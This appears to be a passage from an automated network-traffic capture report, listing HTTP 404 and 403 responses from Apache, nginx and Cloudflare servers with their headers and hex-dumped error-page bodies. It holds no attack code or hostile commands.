                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:36:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 14:37:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeset-cookie: csrfToken=IVvbxKBRGKmun8zqMVhkKBX7; path=/cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jw%2B4udf6pCKUBLANLQkq3RY8FV3j7igaipTSpa4%2BrRae2HJpRsvJYGH7m6SRHEreck0k%2Fv7vzNM58awZ62CRG4LZ4KeOurm%2Fw0h51Xx9GcXoWmdbTNeqV8%2FOcyYjHJ02Cyn%2Btf%2BnS9E%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cad41eced8c343-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1651&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=646&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 30 b2 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 cf 30 b2 03 00 00 00 ff ff 03 00 19 da 55 9f 16 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 300310Vp/JLII0U0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 14:37:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeset-cookie: csrfToken=xLGmHkwsZUoJnyYiS-Tdkxji; path=/cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rvntt9lJ1oj9Sqx816gAtsN0bmM8W74kF%2FhgP3DiZjwMdV8XbpeHmYB1V0KD8u15VwY2ypnDz2iKLw%2Byk1weE2x9FAFTNmwIii9s52Jm5Y4tvLy5FfkYJzVVULdJtRBd9fsYf4PFAk0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cad42eef40c351-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1658&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=670&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 30 b2 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 cf 30 b2 03 00 00 00 ff ff 03 00 19 da 55 9f 16 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 300310Vp/JLII0U0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 14:37:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeset-cookie: csrfToken=XWzppfn7qCSA0v-MeyYV3aUh; path=/cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wOdveccM5QSxnQc0%2BhHRk40V7ufhaBTC0UYRAIDP5BzRCDYV6Yw%2FWlt4vVS2CFK1UWxKvQJnPkWHplbr0yL96HKKtFYoWBmdDEH3kHvccWznit5HF3g1wK1P0PkLlwjYgff%2FPKnFwDA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cad43ebbe43350-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1975&rtt_var=987&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=830&delivery_rate=0&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 30 b2 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 cf 30 b2 03 00 00 00 ff ff 03 00 19 da 55 9f 16 00 00 00 0d 0a Data Ascii: 300310Vp/JLII0U
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:37:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeset-cookie: csrfToken=h1dSrSff1GFJMf9K7gY2TgrV; path=/x-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockx-content-type-options: nosniffx-download-options: noopenx-readtime: 4cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XMF8N3pfWe51X10v%2BfrZgUFdi%2F2R%2B9icSk1xi5J7m0obkAf20dr96DdkvDPTvlg%2Fk0r0pBJdNNN%2FElbCASSvdPCnfXLw8YLveDG3BNIIqF2BMZ8eB7njVIWDh%2B4BkDJTw5SxKC9KwcU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cad44ea97997d5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1984&rtt_var=992&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=376&delivery_rate=0&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 36 0d 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 16<h1>404 Not Found</h1>0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Mar 2025 14:37:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: last_url=content; expires=Sat, 08-Mar-2025 14:37:17 GMT; Max-Age=86400; path=/Set-Cookie: to=%7Curl; expires=Sat, 08-Mar-2025 14:37:17 GMT; Max-Age=86400; path=/Content-Encoding: gzipData Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 53 50 80 00 e7 fc bc 92 d4 bc 12 85 bc fc 12 85 b4 fc d2 bc 14 85 82 c4 f4 54 05 00 7c c0 c9 f9 1f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eSPT|0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Mar 2025 14:37:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: last_url=content; expires=Sat, 08-Mar-2025 14:37:19 GMT; Max-Age=86400; path=/Set-Cookie: to=%7Curl; expires=Sat, 08-Mar-2025 14:37:19 GMT; Max-Age=86400; path=/Content-Encoding: gzipData Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 53 50 80 00 e7 fc bc 92 d4 bc 12 85 bc fc 12 85 b4 fc d2 bc 14 85 82 c4 f4 54 05 00 7c c0 c9 f9 1f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eSPT|0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Mar 2025 14:37:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: last_url=content; expires=Sat, 08-Mar-2025 14:37:22 GMT; Max-Age=86400; path=/Set-Cookie: to=%7Curl; expires=Sat, 08-Mar-2025 14:37:22 GMT; Max-Age=86400; path=/Content-Encoding: gzipData Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 53 50 80 00 e7 fc bc 92 d4 bc 12 85 bc fc 12 85 b4 fc d2 bc 14 85 82 c4 f4 54 05 00 7c c0 c9 f9 1f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eSPT|0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Mar 2025 14:37:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 31Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: from=noref; expires=Sat, 08-Mar-2025 14:37:25 GMT; Max-Age=86400; path=/Set-Cookie: lfrom=noref; expires=Sat, 08-Mar-2025 14:37:25 GMT; Max-Age=86400; path=/Set-Cookie: idcheck=1741358245; expires=Sat, 08-Mar-2025 14:37:25 GMT; Max-Age=86400; path=/Set-Cookie: lp=%2F86jt%2F%3Fbnb%3D31kc%2F%2BWl6LN%2FFjYtTPSiktG84roXnqqnz7GUIvaRHGhqqc%2BFUh3yYBQHAVIb6krW3kfF%2F1gTEhEQBLRlhb5nKhJJaN8HQSgUBksp%2BZppGJbxIuYULA%3D%3D%268v4Hv%3DcpKH3h; expires=Sat, 08-Mar-2025 14:37:25 GMT; Max-Age=86400; path=/Set-Cookie: last_url=content; expires=Sat, 08-Mar-2025 14:37:25 GMT; Max-Age=86400; path=/Set-Cookie: to=%7Curl; expires=Sat, 08-Mar-2025 14:37:25 GMT; Max-Age=86400; path=/Data Raw: 20 20 20 20 20 20 20 20 43 6f 6e 74 65 6e 74 20 6e 6f 74 20 66 6f 75 6e 64 20 70 61 67 65 20 Data Ascii: Content not found page
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Mar 2025 14:37:39 GMTContent-Type: text/htmlContent-Length: 520Connection: closeETag: "66f4124b-208"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 e9 94 9b e5 b1 be e5 81 8d e7 92 87 e9 94 8b e7 9c b0 e9 90 a8 e5 8b ac e6 9e 83 e6 b5 a0 e6 9c b5 e7 ac 89 e7 80 9b e6 a8 ba e6 b9 aa 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Mar 2025 14:37:42 GMTContent-Type: text/htmlContent-Length: 520Connection: closeETag: "66f4124b-208"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 e9 94 9b e5 b1 be e5 81 8d e7 92 87 e9 94 8b e7 9c b0 e9 90 a8 e5 8b ac e6 9e 83 e6 b5 a0 e6 9c b5 e7 ac 89 e7 80 9b e6 a8 ba e6 b9 aa 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Mar 2025 14:37:44 GMTContent-Type: text/htmlContent-Length: 520Connection: closeETag: "66f4124b-208"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 e9 94 9b e5 b1 be e5 81 8d e7 92 87 e9 94 8b e7 9c b0 e9 90 a8 e5 8b ac e6 9e 83 e6 b5 a0 e6 9c b5 e7 ac 89 e7 80 9b e6 a8 ba e6 b9 aa 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 07 Mar 2025 14:37:47 GMTContent-Type: text/htmlContent-Length: 520Connection: closeETag: "66f4124b-208"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 e9 94 9b e5 b1 be e5 81 8d e7 92 87 e9 94 8b e7 9c b0 e9 90 a8 e5 8b ac e6 9e 83 e6 b5 a0 e6 9c b5 e7 ac 89 e7 80 9b e6 a8 ba e6 b9 aa 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:38:01 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:38:03 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:38:06 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:38:08 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 